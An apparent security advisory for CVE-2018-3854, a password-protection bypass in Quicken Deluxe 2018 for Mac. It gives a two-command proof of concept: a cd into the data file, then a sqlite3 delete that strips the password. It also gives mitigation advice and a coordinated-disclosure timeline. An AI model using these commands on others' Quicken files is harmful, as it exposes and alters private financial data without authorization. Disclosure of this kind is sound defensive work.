CVE-2018-3854
An exploitable information disclosure vulnerability exists in the password protection functionality of Quicken Deluxe 2018 for Mac version 5.2.2. A specially crafted sqlite3 request can cause the removal of the password protection, allowing an attacker to access and modify the data without knowing the password. An attacker needs to have access to the password-protected files to trigger this vulnerability.
Intuit Quicken Quicken Deluxe 2018 5.2.2
7.1 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
CWE-288: Authentication Bypass Using an Alternate Path or Channel
Quicken supports a password protection feature for files. This may be enabled in Quicken from the menu by using “File,” followed by “Set File Password.”
The vulnerability is triggered by removing a row from the SQLite database.
The first of two bypass steps is to change to the directory that houses the database in the Quicken data file:
cd '~/Library/Application Support/Quicken/Documents/filename.quicken'
The second step is to call a sqlite3 command to remove the table entry:
| echo delete from ZDOCUMENTPROPERTY where ZNAME is "progressMetadataRefCount" \; | sqlite3 data |
Use FileVault and encrypt backups.
2018-03-06 - Initial Contact; vendor alerted security team
2018-03-09 - Follow up status on security team response
2018-03-20 - Plain text file sent
2018-04-06 - 30 day follow up
2018-06-06 - 90 day follow up
2018-06-27 - Notice of planned public release due to no response; Vendor responded with security team point of contact
2018-06-28 - Copy of plain text file sent
2018-08-30 - Beta release provided for testing
2018-09-06 - Vendor released to customers
2018-10-09 - Public Release
Discovered by Mark Eklund of Cisco ASIG.